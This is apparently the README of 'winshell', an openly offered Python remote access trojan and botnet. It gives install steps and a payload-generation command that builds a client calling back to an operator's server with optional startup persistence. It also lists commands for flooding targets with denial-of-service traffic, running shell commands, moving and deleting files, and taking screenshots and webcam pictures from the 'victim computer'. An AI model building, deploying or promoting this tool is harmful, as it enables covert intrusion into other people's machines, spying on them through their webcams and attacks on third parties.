winshell is a python opensource RAT and Botnet
-
git clone https://github.com/Z4RK/winshell.git
cd winshell
pip install -r requierements.txt
-
git clone https://github.com/Z4RK/winshell.git
cd winshell
./install.sh
pip install -r requierements.txt
- The client can be compiled into an executable file
- Supports multi-clients
- Can perform denial of service attacks with all clients connected to the server
- Can execute all shell commands
- Can upload files
- Can download files
- Can run the client at startup
- Can browse files & more...
-
python generate.py --host <server hostname> --port <port to use> [--out <output name>|--addstartup]
-
-
Commands in the winshell menu
list client
list all clients connected on the serverinteract <client id>
start a session with a clientflood <url/ip>
do a denial of service attacks with all clients connectedquit
quit winshell
-
Commands with a remote session
help
show this messageupload <arg>
upload a filedownload <arg>
download a filecd <arg>
change directoryls
list files in current directoryrm <arg>
remove a filermdir <arg>
remove a directoryscreenshot
take a screenshot from the victim computerwebcam_snap
taka a webcam picture form the victim computergetpid
get the current process idps
list running processsearch <arg>
filter running process by namecurrentporcess
get the current process run on the victim computerforce <arg>
do a shell command with an output (ipconfig, dir)force2 <arg>
do a shell command without an output(mkdir, start...)quit
quit the session
-